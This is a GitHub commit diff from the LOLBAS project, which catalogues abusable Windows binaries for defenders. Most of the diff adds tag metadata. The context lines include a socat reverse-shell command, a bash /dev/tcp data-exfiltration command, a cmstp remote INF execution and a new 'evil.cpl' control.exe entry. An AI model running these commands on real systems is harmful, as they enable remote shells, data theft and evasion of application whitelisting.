Skip to content

Commit 97f0c3f

Browse files
1 parent d3b8a95 commit 97f0c3f

File tree

129 files changed

+520
-59
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

129 files changed

+520
-59
lines changed

_lolbas/Binaries/Addinutil.md

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -11,6 +11,8 @@ Commands:
1111
Privileges: User
1212
MitreID: T1218
1313
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
14+
Tags:
15+
- Execute: .NetObjects
1416
Full_Path:
1517
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe
1618
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe

_lolbas/Binaries/At.md

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -11,6 +11,8 @@ Commands:
1111
Privileges: Local Admin
1212
MitreID: T1053.002
1313
OperatingSystem: Windows 7 or older
14+
Tags:
15+
- Execute: CMD
1416
Full_Path:
1517
- Path: C:\WINDOWS\System32\At.exe
1618
- Path: C:\WINDOWS\SysWOW64\At.exe

_lolbas/Binaries/Atbroker.md

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -11,6 +11,8 @@ Commands:
1111
Privileges: User
1212
MitreID: T1218
1313
OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
14+
Tags:
15+
- Execute: EXE
1416
Full_Path:
1517
- Path: C:\Windows\System32\Atbroker.exe
1618
- Path: C:\Windows\SysWOW64\Atbroker.exe

_lolbas/Binaries/Bash.md

Lines changed: 8 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -11,27 +11,35 @@ Commands:
1111
Privileges: User
1212
MitreID: T1202
1313
OperatingSystem: Windows 10
14+
Tags:
15+
- Execute: CMD
1416
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
1517
Description: Executes a reverseshell
1618
Usecase: Performs execution of specified file, can be used as a defensive evasion.
1719
Category: Execute
1820
Privileges: User
1921
MitreID: T1202
2022
OperatingSystem: Windows 10
23+
Tags:
24+
- Execute: CMD
2125
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
2226
Description: Exfiltrate data
2327
Usecase: Performs execution of specified file, can be used as a defensive evasion.
2428
Category: Execute
2529
Privileges: User
2630
MitreID: T1202
2731
OperatingSystem: Windows 10
32+
Tags:
33+
- Execute: CMD
2834
- Command: bash.exe -c calc.exe
2935
Description: Executes calc.exe from bash.exe
3036
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
3137
Category: AWL Bypass
3238
Privileges: User
3339
MitreID: T1202
3440
OperatingSystem: Windows 10
41+
Tags:
42+
- Execute: CMD
3543
Full_Path:
3644
- Path: C:\Windows\System32\bash.exe
3745
- Path: C:\Windows\SysWOW64\bash.exe

_lolbas/Binaries/Cmstp.md

Lines changed: 3 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,7 @@ Commands:
1212
MitreID: T1218.003
1313
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
1414
Tags:
15-
- Input: INF
15+
- Execute: INF
1616
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
1717
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
1818
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
@@ -21,7 +21,8 @@ Commands:
2121
MitreID: T1218.003
2222
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
2323
Tags:
24-
- Input: INF
24+
- Execute: INF
25+
- Execute: Remote
2526
Full_Path:
2627
- Path: C:\Windows\System32\cmstp.exe
2728
- Path: C:\Windows\SysWOW64\cmstp.exe

_lolbas/Binaries/Conhost.md

Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -11,13 +11,17 @@ Commands:
1111
Privileges: User
1212
MitreID: T1202
1313
OperatingSystem: Windows 10, Windows 11
14+
Tags:
15+
- Execute: CMD
1416
- Command: "conhost.exe --headless calc.exe"
1517
Description: Execute calc.exe with conhost.exe as parent process
1618
Usecase: Specify --headless parameter to hide child process window (if applicable)
1719
Category: Execute
1820
Privileges: User
1921
MitreID: T1202
2022
OperatingSystem: Windows 10, Windows 11
23+
Tags:
24+
- Execute: CMD
2125
Full_Path:
2226
- Path: c:\windows\system32\conhost.exe
2327
Detection:

_lolbas/Binaries/Control.md

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -13,6 +13,15 @@ Commands:
1313
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
1414
Tags:
1515
- Execute: DLL
16+
- Command: control.exe c:\windows\tasks\evil.cpl
17+
Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function)
18+
Usecase: Use to execute code and bypass application whitelisting
19+
Category: Execute
20+
Privileges: User
21+
MitreID: T1218.002
22+
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
23+
Tags:
24+
- Execute: DLL
1625
Full_Path:
1726
- Path: C:\Windows\System32\control.exe
1827
- Path: C:\Windows\SysWOW64\control.exe

_lolbas/Binaries/CustomShellHost.md

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -11,6 +11,8 @@ Commands:
1111
Privileges: User
1212
MitreID: T1218
1313
OperatingSystem: Windows 10, Windows 11
14+
Tags:
15+
- Execute: EXE
1416
Full_Path:
1517
- Path: C:\Windows\System32\CustomShellHost.exe
1618
Detection:

_lolbas/Binaries/Dfsvc.md

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -11,6 +11,9 @@ Commands:
1111
Privileges: User
1212
MitreID: T1127
1313
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
14+
Tags:
15+
- Execute: ClickOnce
16+
- Execute: Remote
1417
Full_Path:
1518
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
1619
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe

_lolbas/Binaries/Diskshadow.md

Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -11,13 +11,17 @@ Commands:
1111
Privileges: User
1212
MitreID: T1003.003
1313
OperatingSystem: Windows server
14+
Tags:
15+
- Execute: CMD
1416
- Command: diskshadow> exec calc.exe
1517
Description: Execute commands using diskshadow.exe to spawn child process
1618
Usecase: Use diskshadow to bypass defensive counter measures
1719
Category: Execute
1820
Privileges: User
1921
MitreID: T1202
2022
OperatingSystem: Windows server
23+
Tags:
24+
- Execute: CMD
2125
Full_Path:
2226
- Path: C:\Windows\System32\diskshadow.exe
2327
- Path: C:\Windows\SysWOW64\diskshadow.exe

0 commit comments

Comments
 (0)